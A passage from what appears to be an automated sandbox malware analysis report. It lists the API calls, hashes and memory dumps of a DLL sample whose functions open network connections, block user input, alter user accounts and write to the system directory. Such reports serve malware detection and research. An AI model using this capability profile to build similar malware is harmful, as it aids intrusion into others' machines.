                                                          • lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094C0
                                                          • LocalAlloc.KERNEL32(00000040,-0000000A,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094CE
                                                          • lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094FC
                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 10009524
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileLocallstrlen$AllocCloseCreateFreeHandleSize
                                                          • String ID:
                                                          • API String ID: 2793549963-0
                                                          • Opcode ID: 1d0de42e81ec7a97ed4485cc77a0b2a80b5f9abe04790932a430d9cbf81657f2
                                                          • Instruction ID: 308c1cce03677ded8cce1838fe27e550398bb3d797b3be4da8be1d4d23af97c4
                                                          • Opcode Fuzzy Hash: 1d0de42e81ec7a97ed4485cc77a0b2a80b5f9abe04790932a430d9cbf81657f2
                                                          • Instruction Fuzzy Hash: 0D3108327002145BD714DE78DC95B9AB2D6FB88621F484639FE1AD73C0DAB5A805C660
                                                          Function 100076F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,?,?), ref: 1000771C
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000,?,?), ref: 10007792
                                                          • SetFilePointer.KERNEL32(00000000,?,?,00000000,?,?), ref: 100077A7
                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 100077C4
                                                          • CloseHandle.KERNEL32(00000000,?,?), ref: 100077CB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateFolderHandlePathPointerSpecialWrite
                                                          • String ID: p
                                                          • API String ID: 2004626570-2181537457
                                                          • Opcode ID: db79ec1e1d2c2a338deb3c310fd97c6c46a2e7c23434e6060fbb021f232cdfea
                                                          • Instruction ID: 1e1907684de1c8bd89ee597228f05c738f3ecf463b7a0146f2a5c42f798544d2
                                                          • Opcode Fuzzy Hash: db79ec1e1d2c2a338deb3c310fd97c6c46a2e7c23434e6060fbb021f232cdfea
                                                          • Instruction Fuzzy Hash: 6331D7756447045BD318CA28CC45FABB796FBC8320F084B2DF95A972D0DAB49E05C751
                                                          Function 10004A60 Relevance: 10.6, APIs: 7, Instructions: 98networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10004F20: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
                                                            • Part of subcall function 10004F20: CancelIo.KERNEL32(?), ref: 10004F57
                                                            • Part of subcall function 10004F20: InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
                                                            • Part of subcall function 10004F20: closesocket.WS2_32(?), ref: 10004F73
                                                            • Part of subcall function 10004F20: SetEvent.KERNEL32(?), ref: 10004F80
                                                          • ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                          • socket.WS2_32 ref: 10004A86
                                                          • gethostbyname.WS2_32(?), ref: 10004AA6
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CancelExchangeInterlockedResetclosesocketgethostbynamesetsockoptsocket
                                                          • String ID:
                                                          • API String ID: 513860241-0
                                                          • Opcode ID: dd6fca4b14ea35cb6b5819fb0315a2d1409d462e86a20a94a99b707d4d32cf9b
                                                          • Instruction ID: 92d35607f8033a3118f145dcfa9d89b9a917cf27699ac872a687df5e96afb08c
                                                          • Opcode Fuzzy Hash: dd6fca4b14ea35cb6b5819fb0315a2d1409d462e86a20a94a99b707d4d32cf9b
                                                          • Instruction Fuzzy Hash: 0731CEB5244301AFE310DF28CC85FDB77E4FF85318F004A1DF2999A280DBB1A4888B66
                                                          Function 10011670 Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #939.MFC42(00000000,00000004,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000), ref: 100116CA
                                                          • #800.MFC42(00000000,00000004,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000), ref: 100116DB
                                                          • #6282.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 100116ED
                                                          • #535.MFC42(00000030,?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 100116F9
                                                          • #535.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 1001173E
                                                          • #535.MFC42(?,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 10011756
                                                            • Part of subcall function 10011790: #540.MFC42 ref: 100117B7
                                                            • Part of subcall function 10011790: #2818.MFC42(00000000, %c%s,?,?), ref: 100117E0
                                                            • Part of subcall function 10011790: #2763.MFC42(00000020), ref: 100117FD
                                                            • Part of subcall function 10011790: #537.MFC42(100FACDC,00000000,00000020), ref: 10011815
                                                            • Part of subcall function 10011790: #537.MFC42(100FB4F0,100FACDC,00000000,00000020), ref: 1001182A
                                                            • Part of subcall function 10011790: #922.MFC42(?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001183B
                                                            • Part of subcall function 10011790: #922.MFC42(?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001184C
                                                            • Part of subcall function 10011790: #939.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 1001185B
                                                            • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011869
                                                            • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011877
                                                            • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011885
                                                            • Part of subcall function 10011790: #800.MFC42(00000000,?,00000000,00000000,?,00000000,-0000000C,100FB4F0,100FACDC,00000000,00000020), ref: 10011893
                                                            • Part of subcall function 10011790: #535.MFC42(00000000), ref: 100118F0
                                                            • Part of subcall function 10011790: #800.MFC42(00000000), ref: 10011906
                                                          • #536.MFC42(00000000,00000001,00000000,00000000,00000001,00000000,00000003,100986D8,000000FF,100113FF,?,000000FF,00000000,?,00000000,00000000), ref: 10011766
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #800$#535$#537#922#939$#2763#2818#536#540#6282
                                                          • String ID:
                                                          • API String ID: 37758464-0
                                                          • Opcode ID: 3d700551163b542b38d8b03b5ef292303f94f415ddb6fbb6d07dd7c0df94b13e
                                                          • Instruction ID: a387ab11639bd89c7a433ae959a7e4b16c1de711adbd724f1b563dcecc6c226d
                                                          • Opcode Fuzzy Hash: 3d700551163b542b38d8b03b5ef292303f94f415ddb6fbb6d07dd7c0df94b13e
                                                          • Instruction Fuzzy Hash: 4F31B036304B509BC768DB19C980A5EB3E5FBC8660F844A2DF15A9B781CA34FD86CB51
                                                          Function 100178C0 Relevance: 10.6, APIs: 7, Instructions: 84keyboardwindowsleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(0000000A), ref: 1001790C
                                                          • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1001792A
                                                          • PostMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1001793D
                                                          • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 10017959
                                                          • PostMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 1001796C
                                                            • Part of subcall function 100172E0: WaitForSingleObject.KERNEL32(?), ref: 10017309
                                                            • Part of subcall function 100172E0: CloseHandle.KERNEL32(?), ref: 10017316
                                                            • Part of subcall function 100172E0: #823.MFC42(00000110), ref: 1001733A
                                                          • BlockInput.USER32(?), ref: 1001797E
                                                            • Part of subcall function 10017CC0: GetSystemMetrics.USER32(00000000), ref: 10017CD7
                                                            • Part of subcall function 10017CC0: GetSystemMetrics.USER32(00000001), ref: 10017CE0
                                                          • BlockInput.USER32(00000000), ref: 100179B1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: System$BlockInfoInputMessageMetricsParametersPost$#823CloseHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 3920574744-0
                                                          • Opcode ID: 6b09300cdc202c23af15b89f165a222c09e950858bc94e696f41fc6c424891a8
                                                          • Instruction ID: 8fe6c1b3b4297c9013963a1cc17c17800823093f6a5e99c6d4d327615f0ff253
                                                          • Opcode Fuzzy Hash: 6b09300cdc202c23af15b89f165a222c09e950858bc94e696f41fc6c424891a8
                                                          • Instruction Fuzzy Hash: 0721083438034421DA14EB340C93FE96776EF42B50F101538BB5E6F1C3CDB5E88A8624
                                                          Function 10025870 Relevance: 10.6, APIs: 7, Instructions: 78stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000), ref: 10025889
                                                          • NetUserGetInfo.NETAPI32(00000000,00000000,00000003,?), ref: 100258B8
                                                            • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 10024614
                                                            • Part of subcall function 100245F0: #823.MFC42(00000002,?,00000000,00000000), ref: 10024621
                                                            • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1002463D
                                                          • NetUserSetInfo.NETAPI32(00000000,00000000,00000003,?,?,?), ref: 100258ED
                                                          • #825.MFC42(00000000,00000000,00000000,00000003,?,?,?), ref: 100258F5
                                                          • #825.MFC42(?,00000000,00000000,00000000,00000003,?,?,?), ref: 10025902
                                                          • NetApiBufferFree.NETAPI32(?), ref: 10025934
                                                          • LocalFree.KERNEL32(?), ref: 1002593E
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #825ByteCharFreeInfoMultiUserWide$#823BufferLocallstrlen
                                                          • String ID:
                                                          • API String ID: 1574401665-0
                                                          • Opcode ID: 4deef81ed9964ded4ef6be6e35d77e14c2eeece9479341862667b8981f28ec86
                                                          • Instruction ID: db542bc96f26d639f55d823ab568073f523843db7179ccf286ad23694a425397
                                                          • Opcode Fuzzy Hash: 4deef81ed9964ded4ef6be6e35d77e14c2eeece9479341862667b8981f28ec86
                                                          • Instruction Fuzzy Hash: 08217FB5608301AFD710DF68EC85E5BBAECEF94604F44042DF58597243EA74E94C8BA2
                                                          Function 100234D0 Relevance: 10.6, APIs: 7, Instructions: 67networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • htons.WS2_32 ref: 100234F3
                                                          • inet_addr.WS2_32(?), ref: 10023509
                                                          • inet_addr.WS2_32(?), ref: 10023527
                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                          • setsockopt.WS2_32 ref: 1002355E
                                                          • connect.WS2_32(?,?,00000010), ref: 1002356E
                                                          • closesocket.WS2_32 ref: 1002357C
                                                            • Part of subcall function 100232C0: gethostbyname.WS2_32(?), ref: 100232C5
                                                            • Part of subcall function 100232C0: inet_ntoa.WS2_32(00000000), ref: 100232D8
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: inet_addr$closesocketconnectgethostbynamehtonsinet_ntoasetsockoptsocket
                                                          • String ID:
                                                          • API String ID: 1372979013-0
                                                          • Opcode ID: a076db341b62b5e459f863378d388fcc54060c0c050763b1ff6fa81f446d88c2
                                                          • Instruction ID: 004383c3fc2686cea437f660dfe81f0b064d2de5a6b80219a309b61b1ccdcd83
                                                          • Opcode Fuzzy Hash: a076db341b62b5e459f863378d388fcc54060c0c050763b1ff6fa81f446d88c2
                                                          • Instruction Fuzzy Hash: 8B11AEB4904711ABE310DF289C85AABB7E8FF84360F548B1DF498D22D0E770D9448B92
                                                          Function 10017200 Relevance: 10.6, APIs: 7, Instructions: 66synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 1001723D
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 10017248
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017259
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017264
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 10017273
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098AD6,000000FF,1000CE1B), ref: 1001727C
                                                          • DestroyCursor.USER32(?), ref: 100172AC
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CursorDestroy
                                                          • String ID:
                                                          • API String ID: 2236516186-0
                                                          • Opcode ID: d8505e23fb446c41012494cd6b92a324ddedd58825db3cd10bd00a0c1f8eaa5b
                                                          • Instruction ID: ef58890a3e63d9af94dba857a36f85de578af6b60b018718c6a648def18a2e7e
                                                          • Opcode Fuzzy Hash: d8505e23fb446c41012494cd6b92a324ddedd58825db3cd10bd00a0c1f8eaa5b
                                                          • Instruction Fuzzy Hash: 12210B752007159FD224DB69CC80BD6B3E8FB89720F150B1EE6AA97390CBB5B8018B91
                                                          Function 100124A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 100124D5
                                                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 100124E3
                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 10012522
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10098376,000000FF), ref: 1001252D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressCriticalDeleteFreeLoadProcSection
                                                          • String ID: closesocket$ws2_32.dll
                                                          • API String ID: 1041861973-181964208
                                                          • Opcode ID: 7ec5b394c5dd60fd7d873c2236bf67511227bc33ef3d5c31afae368c8e1ea57f
                                                          • Instruction ID: 84a0c60808f6a2c03e40c6969a83a2f887d69962a4d8d2a11b52e44a2cc86ffd
                                                          • Opcode Fuzzy Hash: 7ec5b394c5dd60fd7d873c2236bf67511227bc33ef3d5c31afae368c8e1ea57f
                                                          • Instruction Fuzzy Hash: B0119EB55047459BC300DF28DC44B8AFBE8FF44760F400B29F86993390D77899548AA1
                                                          Function 1002CDD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53sleepthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000064,?,?), ref: 1002CDE1
                                                          • wsprintfA.USER32 ref: 1002CE0C
                                                          • closesocket.WS2_32(00000000), ref: 1002CE24
                                                          • TerminateThread.KERNEL32(?,00000000), ref: 1002CE5C
                                                          • CloseHandle.KERNEL32(1012E1E4), ref: 1002CE63
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleSleepTerminateThreadclosesocketwsprintf
                                                          • String ID: nsocket-di:%d
                                                          • API String ID: 1790861966-355283319
                                                          • Opcode ID: 3425da4f1cd7310deef9f02c32fae69de305a835b173f5e1fbd4af5617af4f3a
                                                          • Instruction ID: 43a619284988255665467ed250730387a34e5931f30333b550beeddafff67785
                                                          • Opcode Fuzzy Hash: 3425da4f1cd7310deef9f02c32fae69de305a835b173f5e1fbd4af5617af4f3a
                                                          • Instruction Fuzzy Hash: 47118C34600165AFD710EF6CDCC4F823BE8FB45360FA5463AE804D77A4D779A9668B50
                                                          Function 10026E00 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 10026E26
                                                          • lstrcatA.KERNEL32(?,?), ref: 10026E38
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10026E55
                                                          • CloseHandle.KERNEL32(00000000), ref: 10026E7D
                                                          • LocalFree.KERNEL32(?), ref: 10026E96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
